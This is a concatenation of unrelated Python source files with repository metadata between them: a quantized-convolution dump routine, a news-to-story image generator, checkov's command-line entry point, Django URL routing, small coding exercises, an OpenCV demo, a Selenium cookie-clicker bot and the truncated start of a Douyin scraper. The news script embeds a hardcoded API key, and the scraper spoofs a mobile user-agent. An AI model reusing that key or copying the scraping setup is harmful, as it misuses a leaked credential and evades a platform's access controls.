    shift1, shift_cal, cpu2 = M2scale_TSME(self_M)
    res_d = np.floor( res_d * shift_cal )
    res_d = np.floor(res_d)
    res_d = res_d * cpu2/2**(6)
    res_d = np.floor(res_d)
    # Reference requantization of the centred-input result (exact multiplier).
    res = res.detach().numpy()
    #res = res * M[0]
    res = res * self_M
    res = np.floor(res)
    res = res + zp # add ly
    #res[res>120] = 0
    res = np.floor(np.clip(res, -128, 127))
    res_d = np.floor(np.clip(res_d, -128, 127))
    # Microsecond timestamp used to key this layer's dump files.
    # NOTE(review): the strftime value is immediately overwritten -- dead code.
    now = time.strftime("%Y-%m-%d-%H_%M_%S",time.localtime(time.time()))
    t = time.time()
    now = str(int(round(t * 1000000)))
    # Dump every tensor and quantization parameter for offline comparison.
    np.save('./layer_output_time/' + 'm' + now + '_conv_0_layer_weight_int8' + '.npy', weight)
    np.save('./layer_output_time/' + 'm' + now + '_conv_1_layer_weight_scale' + '.npy', weight_int.q_scale())
    np.save('./layer_output_time/' + 'm' + now + '_conv_2_layer_weight_zero_point' + '.npy', weight_int.q_zero_point())
    np.save('./layer_output_time/' + 'm' + now + '_conv_3_layer_input_int8' + '.npy', input_)
    np.save('./layer_output_time/' + 'm' + now + '_conv_4_layer_input_scale' + '.npy', input.q_scale())
    np.save('./layer_output_time/' + 'm' + now + '_conv_5_layer_input_zero_point' + '.npy', input.q_zero_point())
    np.save('./layer_output_time/' + 'm' + now + '_conv_6_layer_self_M_shift' + '.npy', shift1)
    np.save('./layer_output_time/' + 'm' + now + '_conv_7_layer_self_M_cal' + '.npy', shift_cal)
    np.save('./layer_output_time/' + 'm' + now + '_conv_8_layer_self_M_cpu' + '.npy', cpu2)
    np.save('./layer_output_time/' + 'm' + now + '_conv_9_layer_bias_int32' + '.npy', np.floor(bias+diff[0,:,3,3]+zp/self_M))
    np.save('./layer_output_time/' + 'm' + now + '_conv_A_layer_output_int8' + '.npy', res_d)
    np.save('./layer_output_time/' + 'm' + now + '_conv_B_layer_out_scale' + '.npy', scale)
    np.save('./layer_output_time/' + 'm' + now + '_conv_C_layer_out_zero_point' + '.npy', zp)
    np.save('./layer_output_time/' + 'm' + now + '_conv_D_layer_stride' + '.npy', stride)
    # Serialize the weights into accelerator tile order and write them out.
    weight_ser = serializeWeight(weight.permute(2,3,1,0))
    write_weight_b(weight_ser, np.floor(bias+diff[0,:,3,3]+zp/self_M))
    # Align both results to the quantized-tensor format.
    res = res.astype(np.float32)
    res = torch.tensor(scale * (res - zp))
    res1 = torch.quantize_per_tensor(res ,scale = scale , zero_point = zp, dtype = torch.qint8)
    res_d = res_d.astype(np.float32)
    res_d = torch.tensor(scale * (res_d - zp))
    res_d = torch.quantize_per_tensor(res_d, scale=scale, zero_point=zp, dtype=torch.qint8)
return res_d | poyue0221/Learing_me | Pytorch_Retinaface/quanzition_windows/at5k_1/qconv2d.py | qconv2d.py | py | 12,163 | python | en | code | 1 | github-code | 90 |
30095652501 | from PIL import Image, ImageFont, ImageDraw
from newsapi import NewsApiClient
import requests
from io import BytesIO
import os
import time
import sys
import textwrap
import math
def createStory1(img, title, desc, url):
    """Overlay title, description and URL boxes onto *img* (a 1080px-tall
    story layout) and return the annotated image."""
    imgWidth = img.width
    imgHeight = img.height
    # NOTE(review): 'FONT_FOLDER' looks like a placeholder -- point it at a
    # real directory containing arial.ttf before running.
    fontsFolder = 'FONT_FOLDER'
    # Windows
    arialFont = ImageFont.truetype(os.path.join(fontsFolder, 'arial.ttf'), math.ceil(imgWidth / imgHeight) * 25)
    arialFontsM = ImageFont.truetype(os.path.join(fontsFolder, 'arial.ttf'), math.ceil(imgWidth / imgHeight) * 25)
    # Mac
    # arialFont = ImageFont.truetype('/Library/Fonts/Arial.ttf', math.ceil(imgWidth / imgHeight) * 25)
    # arialFontsM = ImageFont.truetype('/Library/Fonts/Arial.ttf', math.ceil(imgWidth / imgHeight) * 25)
    draw = ImageDraw.Draw(img)
    # design idea for TAMU branding purposes
    draw.rectangle((0, 0, 35, 360), fill=(0,60,113))
    draw.rectangle((0, 360, 35, 720), fill=(91,98,54))
    draw.rectangle((0, 720, 35, 1080), fill=(116,79,40))
    # Each text box is a black rectangle offset 10px beneath a white one,
    # giving a drop-shadow effect, with the wrapped text drawn on top.
    # article title background
    draw.rectangle((60, 60, 610, 120), fill="black")
    # article title
    draw.rectangle((50, 50, 600, 110), fill="white")
    # title text
    draw.text((60, 50), "\n".join(textwrap.wrap(title, width=45)), fill='black', font=arialFont)
    # article desc background
    draw.rectangle((210, 450, 600, 650), fill="black")
    # article desc
    draw.rectangle((200, 440, 590, 640), fill="white")
    # desc text
    draw.text((210, 440), "\n".join(textwrap.wrap(desc, width=30)), fill='black', font=arialFontsM)
    # article url background
    draw.rectangle((60, 1010, 610, 1070), fill="black")
    # article url
    draw.rectangle((50, 1000, 600, 1060), fill="white")
    # url text
    draw.text((60, 1000), "\n".join(textwrap.wrap(url, width=45)), fill='black', font=arialFontsM)
    return img
def createStory2(im, artIm, t, d, url):
    """Paste the article image *artIm* onto background *im* and draw the
    title *t*, description *d* and *url* in white; return the composite."""
    im.paste(artIm, (100,625))
    draw = ImageDraw.Draw(im)
    # backgroundImg = ImageDraw.resize(newSize)
    # NOTE(review): 'FONT_FOLDER' looks like a placeholder path -- confirm.
    fontsFolder = 'FONT_FOLDER'
    arialFont = ImageFont.truetype(os.path.join(fontsFolder, 'arial.ttf'), 60)
    # arialFont = ImageFont.truetype('/Library/Fonts/Arial.ttf', 60)
    arialFontsM = ImageFont.truetype(os.path.join(fontsFolder, 'arial.ttf'), 50)
    # arialFontsM = ImageFont.truetype('/Library/Fonts/Arial.ttf', 50)
    # Title near the top; the fixed y-coordinates below assume a tall
    # (~2400px) background image.
    draw.text((100, im.height/6), "\n".join(textwrap.wrap(t, width=45)), fill='white', font=arialFont)
    # draw.text((100, 1500), "\n".join(textwrap.wrap(frontA, width=45)), fill='white', font=arialFontsM)
    # draw.text((100, 1600), "\n".join(textwrap.wrap(backA, width=45)), fill='white', font=arialFontsM)
    draw.multiline_text((100, 1500), "\n".join(textwrap.wrap(d, width=50)), fill='white', spacing=15,font=arialFontsM)
    draw.text((100, 2200), "\n".join(textwrap.wrap(url, width=50)), fill='white', font=arialFontsM)
    return im
def createImage(topic, loc, backgroundPath):
    """Fetch the loc-th news article about *topic*, render it onto the given
    background template, save the result under static/ and leave the new
    file name for the caller."""
    sys.tracebacklimit = 0
    # Callers pass a 1-based article index.
    location = loc - 1
    # NOTE(review): hard-coded API key committed to source -- rotate it and
    # load it from an environment variable or config file instead.
    newsapi = NewsApiClient(api_key='87f90668eabb44b98fa88a4f007804b5')
    # articleTopic = input('Enter Topic:')
    all_articles = newsapi.get_everything(q=topic)
    # potentially play around w/ img resize to get uniform dimensions
    u = all_articles['articles'][location]['urlToImage']
    t = all_articles['articles'][location]['title']
    d = all_articles['articles'][location]['description']
    url = all_articles['articles'][location]['url']
    response = requests.get(u)
    img = Image.open(BytesIO(response.content)) # article image
    im = Image.open('static/backgrounds/' + backgroundPath) # background image
    storyImg = im
    # Layout 1 draws boxed text only; layout 2 also pastes the article image.
    if(backgroundPath == "articlepic.png"):
        storyImg = createStory1(im, t, d, url)
    else:
        storyImg = createStory2(im, img, t, d, url)
    # Timestamped name avoids browser caching of a previous render.
    new_name = "topic2instagram" + str(time.time()) + ".png"
    # Delete older generated images so static/ holds only the newest one.
    for filename in os.listdir('static/'):
        if filename.startswith('topic2instagram'): # not to remove other images
            os.remove('static/' + filename)
    storyImg.save('static/' + new_name)
return new_name | PablooogiN/Story2Instagram | topicToStory.py | topicToStory.py | py | 4,096 | python | en | code | 0 | github-code | 90 |
42368220590 | #!/usr/bin/env python
import atexit
import argparse
import os
import shutil
from pathlib import Path
from checkov.arm.runner import Runner as arm_runner
from checkov.cloudformation.runner import Runner as cfn_runner
from checkov.common.bridgecrew.platform_integration import bc_integration
from checkov.common.goget.github.get_git import GitGetter
from checkov.common.runners.runner_registry import RunnerRegistry, OUTPUT_CHOICES
from checkov.common.util.banner import banner as checkov_banner
from checkov.common.util.consts import DEFAULT_EXTERNAL_MODULES_DIR
from checkov.common.util.docs_generator import print_checks
from checkov.common.util.type_forcers import convert_str_to_bool
from checkov.kubernetes.runner import Runner as k8_runner
from checkov.logging_init import init as logging_init
from checkov.runner_filter import RunnerFilter
from checkov.serverless.runner import Runner as sls_runner
from checkov.terraform.plan_runner import Runner as tf_plan_runner
from checkov.terraform.runner import Runner as tf_runner
from checkov.version import version
outer_registry = None
logging_init()
def run(banner=checkov_banner):
    """Entry point of the checkov CLI: parse arguments, configure runners,
    scan the requested directories/files and print/persist the reports."""
    parser = argparse.ArgumentParser(description='Infrastructure as code static analysis')
    add_parser_args(parser)
    args = parser.parse_args()
    # Filter deciding which frameworks/checks each runner executes.
    runner_filter = RunnerFilter(framework=args.framework, checks=args.check, skip_checks=args.skip_check,
                                 download_external_modules=convert_str_to_bool(args.download_external_modules),
                                 external_modules_download_path=args.external_modules_download_path,
                                 evaluate_variables=convert_str_to_bool(args.evaluate_variables))
    # A pre-built registry (set by embedders via the module-level
    # outer_registry) takes precedence over the default runner set.
    if outer_registry:
        runner_registry = outer_registry
        runner_registry.runner_filter = runner_filter
    else:
        runner_registry = RunnerRegistry(banner, runner_filter, tf_runner(), cfn_runner(), k8_runner(), sls_runner(),
                                         arm_runner(), tf_plan_runner())
    if args.version:
        print(version)
        return
    # Bridgecrew platform integration requires a well-formed repo id.
    if args.bc_api_key:
        if args.repo_id is None:
            parser.error("--repo-id argument is required when using --bc-api-key")
        if len(args.repo_id.split('/')) != 2:
            parser.error("--repo-id argument format should be 'organization/repository_name' E.g "
                         "bridgecrewio/checkov")
        bc_integration.setup_bridgecrew_credentials(bc_api_key=args.bc_api_key, repo_id=args.repo_id)
    guidelines = {}
    if not args.no_guide:
        guidelines = bc_integration.get_guidelines()
    # Allowlist and denylist are mutually exclusive.
    if args.check and args.skip_check:
        parser.error("--check and --skip-check can not be applied together. please use only one of them")
        return
    if args.list:
        print_checks(framework=args.framework)
        return
    external_checks_dir = get_external_checks_dir(args)
    if args.directory:
        # Scan each root directory; results are uploaded per directory when
        # the Bridgecrew integration is configured.
        for root_folder in args.directory:
            file = args.file
            scan_reports = runner_registry.run(root_folder=root_folder, external_checks_dir=external_checks_dir,
                                               files=file, guidelines=guidelines)
            if bc_integration.is_integration_configured():
                bc_integration.persist_repository(root_folder)
                bc_integration.persist_scan_results(scan_reports)
                bc_integration.commit_repository(args.branch)
            runner_registry.print_reports(scan_reports, args)
        return
    elif args.file:
        # File mode: scan the given files; their common prefix acts as the
        # repository root for uploads.
        scan_reports = runner_registry.run(external_checks_dir=external_checks_dir, files=args.file,
                                           guidelines=guidelines)
        if bc_integration.is_integration_configured():
            files = [os.path.abspath(file) for file in args.file]
            root_folder = os.path.split(os.path.commonprefix(files))[0]
            bc_integration.persist_repository(root_folder)
            bc_integration.persist_scan_results(scan_reports)
            bc_integration.commit_repository(args.branch)
        runner_registry.print_reports(scan_reports, args)
    else:
        # No target given: show the banner and the onboarding flow.
        print(f"{banner}")
        bc_integration.onboarding()
def add_parser_args(parser):
    """Register every checkov CLI flag on *parser* (used by run())."""
    # Scan targets and external check sources.
    parser.add_argument('-v', '--version',
                        help='version', action='store_true')
    parser.add_argument('-d', '--directory', action='append',
                        help='IaC root directory (can not be used together with --file).')
    parser.add_argument('-f', '--file', action='append',
                        help='IaC file(can not be used together with --directory)')
    parser.add_argument('--external-checks-dir', action='append',
                        help='Directory for custom checks to be loaded. Can be repeated')
    parser.add_argument('--external-checks-git', action='append',
                        help='Github url of external checks to be added. \n you can specify a subdirectory after a '
                             'double-slash //. \n cannot be used together with --external-checks-dir')
    # Output and check-selection options.
    parser.add_argument('-l', '--list', help='List checks', action='store_true')
    parser.add_argument('-o', '--output', nargs='?', choices=OUTPUT_CHOICES,
                        default='cli',
                        help='Report output format')
    parser.add_argument('--no-guide', action='store_true',
                        default=False,
                        help='do not fetch bridgecrew guide in checkov output report')
    parser.add_argument('--quiet', action='store_true',
                        default=False,
                        help='in case of CLI output, display only failed checks')
    parser.add_argument('--framework', help='filter scan to run only on a specific infrastructure code frameworks',
                        choices=['cloudformation', 'terraform', 'terraform_plan', 'kubernetes', 'serverless', 'arm',
                                 'all'],
                        default='all')
    parser.add_argument('-c', '--check',
                        help='filter scan to run only on a specific check identifier(allowlist), You can '
                             'specify multiple checks separated by comma delimiter', default=None)
    parser.add_argument('--skip-check',
                        help='filter scan to run on all check but a specific check identifier(denylist), You can '
                             'specify multiple checks separated by comma delimiter', default=None)
    parser.add_argument('-s', '--soft-fail',
                        help='Runs checks but suppresses error code', action='store_true')
    # Bridgecrew platform integration.
    parser.add_argument('--bc-api-key', help='Bridgecrew API key')
    parser.add_argument('--repo-id',
                        help='Identity string of the repository, with form <repo_owner>/<repo_name>')
    parser.add_argument('-b', '--branch',
                        help="Selected branch of the persisted repository. Only has effect when using the --bc-api-key flag",
                        default='master')
    # Terraform external-module handling and variable evaluation.
    parser.add_argument('--download-external-modules',
                        help="download external terraform modules from public git repositories and terraform registry",
                        default=False)
    parser.add_argument('--external-modules-download-path',
                        help="set the path for the download external terraform modules",
                        default=DEFAULT_EXTERNAL_MODULES_DIR)
    parser.add_argument('--evaluate-variables',
                        help="evaluate the values of variables and locals",
                        default=True)
def get_external_checks_dir(args):
    """Resolve the external-checks directory list.

    A --external-checks-git URL takes precedence: the repo is cloned to a
    temp location that is removed again at interpreter exit.
    """
    if not args.external_checks_git:
        return args.external_checks_dir
    getter = GitGetter(args.external_checks_git[0])
    checks_dir = [getter.get()]
    # Clean up the cloned checkout when the process terminates.
    atexit.register(shutil.rmtree, str(Path(checks_dir[0]).parent))
    return checks_dir
# Script entry point for direct execution (console scripts call run() instead).
if __name__ == '__main__':
    run()
| jensskott/tf-compliance | venv/lib/python3.9/site-packages/checkov/main.py | main.py | py | 8,043 | python | en | code | 0 | github-code | 90 |
def main():
    """AGC fence problem: given a '<'/'>' string, print the minimal total
    height assignment where arr[i] < arr[i+1] at '<' and arr[i] > arr[i+1]
    at '>'."""
    s = input()
    n = len(s)
    heights = [0] * (n + 1)
    # Left-to-right pass: each '<' forces the right neighbour one higher.
    for idx, ch in enumerate(s):
        if ch == "<":
            heights[idx + 1] = heights[idx] + 1
    # Right-to-left pass: each '>' forces the left neighbour one higher,
    # keeping whatever the first pass already required.
    for idx in range(n - 1, -1, -1):
        if s[idx] == ">":
            heights[idx] = max(heights[idx], heights[idx + 1] + 1)
    print(sum(heights))


if __name__ == "__main__":
    main()
| Aasthaengg/IBMdataset | Python_codes/p02873/s082946344.py | s082946344.py | py | 331 | python | en | code | 0 | github-code | 90 |
21461747880 | from django.conf.urls import url, include
from django.urls import path
from rest_framework import routers, serializers, viewsets
from .views import loginEndpoint, register, NotSeenRentOffersViewSet, ReactionsViewSet
# DRF router that auto-generates list/detail routes for the viewsets below.
router = routers.DefaultRouter()
router.register(
    r"^api/rentoffers", NotSeenRentOffersViewSet, basename="NotSeenRentOffersViewSet"
)
router.register(r"^api/reactions", ReactionsViewSet, basename="ReactionsViewSet")
urlpatterns = [
    # NOTE(review): django.conf.urls.url() is deprecated and removed in
    # Django 4.0; re_path() is the drop-in replacement -- confirm the
    # project's Django version before upgrading.
    url(r"^", include(router.urls)),
    # Plain function endpoints for authentication.
    path("api/login", loginEndpoint),
    path("api/register", register),
]
| MichalKarol/rent-tinder | backend/api/urls.py | urls.py | py | 567 | python | en | code | 0 | github-code | 90 |
18223558159 | import itertools
# ABC "many requirements": choose a non-decreasing sequence A of length N
# over 1..M maximizing the total of d for every query (a, b, c, d) with
# A[b-1] - A[a-1] == c. (itertools is imported on the preceding line; the
# following line prints max_answer.)
N, M, Q = map(int, input().split())
queries = [tuple(map(int, input().split())) for _ in range(Q)]

max_answer = 0
# combinations_with_replacement enumerates exactly the non-decreasing tuples.
for A in itertools.combinations_with_replacement(range(1, M + 1), N):
    score = sum(d for a, b, c, d in queries if A[b - 1] - A[a - 1] == c)
    if score > max_answer:
        max_answer = score
print(max_answer) | Aasthaengg/IBMdataset | Python_codes/p02695/s418689100.py | s418689100.py | py | 556 | python | en | code | 0 | github-code | 90 |
27195848568 | """ 1. WAP to remove all the duplicate elements in the list """
# names = ['apple', "google", "apple", "yahoo", "google"]
# l = []
# Method 1:
# for element in names:
# if element not in l:
# l.append(element)
#
# print(l) # ['apple', 'google', 'yahoo']
# Method 2:
# for element in names:
# if names.count(element) == 1:
# l.append(element)
#
# print(l) # ['yahoo']
# Method 3: by using set()
# print(set(names)) # {'apple', 'google', 'yahoo'}
""" 2. WAP to print all numeric values in a list """
# items = ['apple', 1.2, "google", "12.6", 26, "734"]
# Method 1: by using comprehension
# list_ = [item for item in items if isinstance(item, (int, float, complex))]
# print(list_)
# Method 2:
# l = []
# for element in items:
# if isinstance(element, (int, float, complex)):
# l.append(element)
#
# print(l)
""" 3. WAP to sum all even numbers in the given string """
# sentence = "hello 123 world 567 welcome to 9724 python"
# sum_ = 0
# # Method 1:
# for char in sentence:
# if char.isdigit() and int(char) % 2 == 0:
# sum_ += int(char)
#
# print(f"Sum of all even numbers are {sum_}")
""" 4. WAP to create a list with all the languages which starts with "p" or "P" """
# languages = ["Python", "Java", "Perl", "PHP", "python", "JS", "c++", "JS", "python", "ruby"]
#
# # by using list comprehension:
# l = [element for element in languages if element[0] in "pP"]
# print(l)
""" 4.1 WAP to create a set with all the languages which starts with "p" or "P" """
# languages = ["Python", "Java", "Perl", "PHP", "python", "JS", "c++", "JS", "python", "ruby"]
#
# # Method 1: by using set comprehension:
# set_ = {element for element in languages if element[0] in "pP"}
# print(set_)
#
# # Method 2:
# set_ = set()
#
# for item in languages:
# if item[0] in "pP": # if item[0].lower() in "p":
# set_.add(item)
#
# print(set_)
""" 5. Build a list with only even length string """
# names = ["apple", "google", "yahoo", "facebook", "yelp", "flipkart", "gmail", "instagram", "microsoft"]
#
# # method 1: using list comprehension
# print([item for item in names if len(item) % 2 == 0])
""" 6. Reverse the item of a list if the item is of odd length string otherwise keep the item as it is """
# names = ["apple", "google", "yahoo", "facebook", "yelp", "flipkart", "gmail", "instagram", "microsoft"]
# # Method 1: by using comprehension
# print([word[::-1] if len(word) % 2 != 0 else word for word in names])
# print([word if len(word) % 2 == 0 else word[::-1] for word in names])
#
# # Method 2:
# l = []
# for word in names:
# if len(word) % 2 == 0:
# l.append(word)
# else:
# l.append(word[::-1])
# print(l)
""" 7. WAP to print the sum of entire list and sum of only internal list """
# l = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
#
# entire_sum = 0
#
# for item in l: # [1, 2, 3], [4, 5, 6], [7, 8, 9]
# internal_sum = 0
# for i in item: # (1, 2, 3), (4, 5, 6)
# internal_sum += i
# entire_sum += i # 0+1= 1, 1+2= 3, 3+3=6, 6+4=10, 10+5=15, 15+6= 21
# print(f'Sum of internal list {internal_sum}')
# print(f'Sum of entire list --> {entire_sum}') # 6 + 15 + 24 = 45
""" 8. WAP to print list of Prime numbers between 1 - 100 """
# # Method 1:
# for num in range(1, 101):
# if num > 1:
# for i in range(2, num):
# if num % i == 0:
# break
# else:
# print(num, end=" ")
# print()
#
# # Method 2: Store inside a list
# l = []
# for num in range(1, 101):
# if num > 1:
# for i in range(2, num):
# if num % i == 0:
# break
# else:
# l.append(num)
#
# print(l)
""" 9. WAP to reverse the list as below """
# words = ["hi", "hello", "pytho"]
# # output = ['nohtyp', 'olleh', 'ih']
#
# # Method 1: by using reversed()
# print([word[::-1] for word in reversed(words)])
#
# # Method 2: by using range()
# print([words[index][::-1] for index in range(len(words)-1, -1, -1)])
#
# # Method 3: by using slicing
# print([word[::-1] for word in words[::-1]])
""" 10. WAP to rotate item of the list """
# Exercise 10 fixtures: rotate `item` right by `k` positions (solutions below).
item = ['apple', 1.2, 'google', "12.6", 26, '100']
k = 2
# output = [26, '100', 'apple', 1.2, 'google', '12.6']
# Method 1: by using while loop
# i = 1
#
# while i <= k:
# *n1, n2 = item
# item = n2, *n1
# i += 1
#
# print(item)
# Method 2: **********************************************************
# for i in range(k):
# remove_element = item.pop()
# item.insert(0, remove_element)
#
# print(item) | njmujawar/selenium_practise | Sau_/Assesments/Assesment 2 (List).py | Assesment 2 (List).py | py | 4,624 | python | en | code | 0 | github-code | 90 |
7905818289 | from . import log
from sqlalchemy import exists
class Exporter(object):
    """Abstract recipe sink: subclasses implement exists() and add()."""

    def exists(self, url):
        # Return True when a recipe with this source URL is already stored.
        raise NotImplementedError

    def add(self, recipe):
        # Persist the given recipe object.
        raise NotImplementedError
"""
A class for exporting recipes to an sql alchemy database.
Pass in the db instance, recipe model and ingredients model
and use add_recipe to add Recipe objects to the database.
"""
def __init__(self, db, recipe_model, ingredients_model, upload_image):
self.db = db
self.recipe_model = recipe_model
self.ingredients_model = ingredients_model
self.upload_image = upload_image
def exists(self, url):
return self.db.session.query(exists().where(
self.recipe_model.url == url)).scalar()
def add(self, recipe):
log.info('Adding recipe {} to db'.format(recipe.url))
try:
image = self.upload_image(recipe.image_file)
except IOError:
log.error(
"Couldn't load image for recipe:{}".format(recipe.url))
image = None
if self.exists(recipe.url):
return
rmodel = self.recipe_model()
for attrib in ('url',
'name',
'author',
'recipe_yield',
'recipe_category',
'recipe_cuisine',
'cook_time',
'prep_time',
'total_time'):
setattr(rmodel, attrib,
getattr(recipe, attrib))
rmodel.ingredients = [
self.ingredients_model(name=ingr) for
ingr in recipe.ingredients]
rmodel.image = image
self.db.session.merge(rmodel)
self.db.session.commit()
def scrape_and_export(exporter, *crawlers):
    """Instantiate every crawler class with *exporter*, then feed each
    crawled recipe into the exporter."""
    instances = [make(exporter) for make in crawlers]
    for source in instances:
        for recipe in source.crawl():
            exporter.add(recipe)
| steinitzu/recipe_scrapers | recipe_scrapers/export.py | export.py | py | 2,020 | python | en | code | 0 | github-code | 90 |
5618869141 | import numpy as np
import argparse
# 构造解析函数 包? 外部导入图片的包
import cv2
# 用恐龙做这个真的看不出什么
ap = argparse.ArgumentParser()
ap.add_argument("-i","--image",required=True,
help = " Path to the image")
args = vars(ap.parse_args())
# Load the image and grab each colour channel.
image = cv2.imread(args["image"])
(B,G,R) = cv2.split(image) # OpenCV/NumPy store channels in BGR order, the reverse of RGB
# cv2.split separates the image into its individual B, G, R planes.
cv2.imshow("Red",R)
cv2.imshow("Green",G)
cv2.imshow("Blue",B)
cv2.waitKey(0)
# Re-merge the channels back into a single image.
merged = cv2.merge([B,G,R]) # merge also expects the reversed (BGR) order
cv2.imshow("Merged",merged)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Display each channel in its own colour by zeroing the other two planes.
zeros = np.zeros(image.shape[:2], dtype="uint8")  # fixed typo: was dytpe, which raises TypeError
cv2.imshow("Red", cv2.merge([zeros, zeros, R]))
cv2.imshow("Green", cv2.merge([zeros, G, zeros]))  # fixed window title: was "Rred"
cv2.imshow("Blue", cv2.merge([B, zeros, zeros]))
cv2.waitKey(0) | Chentao2000/practice_code | Python_OpenCV/(Practical-Python-and-OpenCV_book1)/ch6/6_22_splitting_and_merging.py | 6_22_splitting_and_merging.py | py | 959 | python | zh | code | 0 | github-code | 90 |
35219691009 | from itertools import permutations
# Rank each element: p[i] is the position a[i] occupies in sorted order.
n = int(input())
a = list(map(int, input().split()))
a1 = sorted(a)  # ints are immutable, so a sorted shallow copy replaces deepcopy
p = []
for i in range(n):
    idx = a1.index(a[i])
    p.append(idx)
    # Consume the slot so duplicate values get distinct ranks.
    # NOTE(review): the -1 sentinel assumes input values are never -1 — confirm constraints.
    a1[idx] = -1
print(*p)
| yongwoo97/algorithm | silver/1015_수열 정렬.py | 1015_수열 정렬.py | py | 241 | python | en | code | 0 | github-code | 90 |
34716157901 | from selenium import webdriver
from selenium.webdriver.common.by import By
import time
chrome_driver_path = "/Users/huangshihao/Development/chromedriver"
driver = webdriver.Chrome(executable_path=chrome_driver_path)
driver.get("http://orteil.dashnet.org/experiments/cookie/")
count = 0
# grandma_value = driver.find_element(By.CSS_SELECTOR,"#buyGrandma b")
# print(grandma_value.text.split()[2])
timeout = time.time() + 60
nowtime = time.time() + 5
addfuncs = driver.find_element(By.ID,"store")
def add_funcs():
    """Collect the integer shown as the last token of every store row
    containing '-' (presumably the item price; thousands separators are
    stripped before conversion).
    """
    prices = []
    for row in addfuncs.text.split("\n"):
        if "-" in row:
            prices.append(int(row.split()[-1].replace(",", "")))
    return prices
def find_max(money, fun_list):
    """Return (price, index) of the priciest item in the ascending price
    list *fun_list* that costs at most *money*.

    Fixes two edge cases: previously the loop fell through and returned
    None when everything was affordable (crashing the caller's tuple
    unpacking), and index -1 selected the *most* expensive item when
    nothing was affordable; we now clamp to the cheapest instead. Using
    enumerate also avoids list.index() misfiring on duplicate prices.
    """
    best = 0  # fall back to the cheapest item when nothing is affordable
    for i, price in enumerate(fun_list):
        if money < price:
            break
        best = i  # every price up to and including i is affordable
    return fun_list[best], best
def find_id_name(id):
    """Translate a store index (ascending price order) into the DOM id of
    its buy button; any index outside 0-7 maps to the last item.
    """
    names = {
        0: "buyCursor",
        1: "buyGrandma",
        2: "buyFactory",
        3: "buyMine",
        4: "buyShipment",
        5: "buyAlchemy lab",
        6: "buyPortal",
        7: "buyTime machine",
    }
    return names.get(id, "buyElder Pledge")
# Main game loop: click the cookie as fast as possible; every 5 seconds buy
# the priciest affordable upgrade; stop after the 60-second deadline.
while True:
    #time.sleep(0.1)
    cookie_click = driver.find_element(By.XPATH,'//*[@id="cookie"]')
    cookie_click.click()
    count += 1
    if time.time() > nowtime:
        # Re-read store prices and current cookie balance.
        test_list = add_funcs()
        print(test_list)
        cookies_num = driver.find_element(By.ID,"money")
        cookies_num = int(cookies_num.text.replace(',',''))
        # NOTE(review): find_max falls through and returns None when every
        # item is affordable — this unpacking would raise; confirm.
        cost, cost_index = find_max(money=cookies_num,fun_list=test_list)
        id_name = find_id_name(cost_index)
        print(cost_index)
        click = driver.find_element(By.ID, id_name)
        click.click()
        nowtime = time.time() + 5  # next purchase check in 5 seconds
    if time.time() > timeout:
        break
driver.quit() | hao134/100_day_python | day48_selenium_webdriver_browser_and_game_playing_bot/clickcookie.py | clickcookie.py | py | 1,946 | python | en | code | 2 | github-code | 90 |
8257231743 | from datetime import timedelta as t
from datetime import datetime as d
def gi(h):
    """Extend the global ``pre`` list with every prime in [2, h]."""
    for candidate in range(2, h + 1):
        if pr_fun(candidate):
            pre.append(candidate)
def pr_fun(h):
    """Primality test by trial division.

    Only divisors up to sqrt(h) are tried, replacing the original O(h)
    scan; behavior is unchanged (h <= 1 is never prime).
    """
    if h <= 1:
        return False
    k = 2
    while k * k <= h:
        if h % k == 0:
            return False
        k += 1
    return True
dye, dwk, h = input().split()  # start date (YYYYMMDD), target weekday name, day limit
h = int(h)
pre = []
gi(365)  # collect the prime day-offsets up to one year
dadic = {0: "Mon", 1: "Tue", 2: "Wed", 3: "Thu", 4: "Fri", 5: "Sat", 6: "Sun"}
dye = d.strptime(dye, "%Y%m%d")
das = -1  # -1 means "no qualifying offset found"
# Find the smallest prime offset whose date lands in a prime-numbered month
# on the requested weekday.
for k in pre:
    dte = dye + t(k)
    if pr_fun(dte.month) and dadic[dte.weekday()] == dwk:
        das = k
        break
if das == -1:
    print("No", 0, end="")
elif das <= h:
    print("Yes", das, end="")
else:
    print("No", das, end="")
| harsh6754/DSA-Problems | leetcode/PrmeVilla.py | PrmeVilla.py | py | 728 | python | en | code | 1 | github-code | 90 |
41529537851 | # -*- coding: utf-8 -*-
# @Author : 李惠文
# @Email : 2689022897@qq.com
# @Time : 2020/7/3 10:58
# 抖音爬虫
import datetime
import os
import sys
import getopt
import urllib.parse
import urllib.request
import copy
import codecs
import requests
import re
from six.moves import queue as Queue
from threading import Thread
import json
import time
# 自定义请求头文件
HEADERS = {
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9',
'pragma': 'no-cache',
'Accept-Encoding': '',
'cache-control': 'no-cache',
'upgrade-insecure-requests': '1',
'user-agent': "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1",
}
# 下载超时时间
TIMEOUT = 10
# 重试下载次数
RETRY = 5
# 下载失败过多,视为爬虫失败,停止继续爬虫
RESULTS_VARIATION_RETRY = 5000
# 设置十条线程下载
THREADS = 10
# 是否爬取该用户“喜欢”的作品
DOWNLOAD_FAVORITE = False
# 通过content-length头获取远程文件大小
def getRemoteFileSize(url):
    """Return the remote file's size in bytes via an HTTP HEAD request.

    Returns 0 when the server rejects the request (e.g. 404/403) or no
    Content-Length header is present.
    """
    request = urllib.request.Request(url)
    request.get_method = lambda: 'HEAD'
    try:
        response = urllib.request.urlopen(request)
    except urllib.error.HTTPError as e:
        # Remote file unavailable: log status and body, report size 0.
        print(e.code)
        print(e.read().decode("utf8"))
        return 0
    # Use the case-insensitive header mapping directly; dict(...) made the
    # 'Content-Length' lookup case-sensitive. A HEAD response carries no
    # body, so the original response.read() was dropped.
    return int(response.headers.get('Content-Length', 0))
# 下载文件
def download(medium_type, uri, medium_url, target_folder):
    """Download one medium ('video' or 'image') into *target_folder*.

    The file name is derived from *uri*; a file whose local size matches
    the remote Content-Length is skipped. Up to RETRY attempts are made;
    after total failure the partial file is removed.
    """
    headers = copy.deepcopy(HEADERS)
    file_name = uri.strip()
    # Unnamed file: fall back to "无名文件" + current timestamp.
    if (not file_name):
        now_time = str(datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
        file_name = "无名文件" + now_time
    if medium_type == 'video':
        file_name += '.mp4'
        # Videos require the Aweme client user-agent.
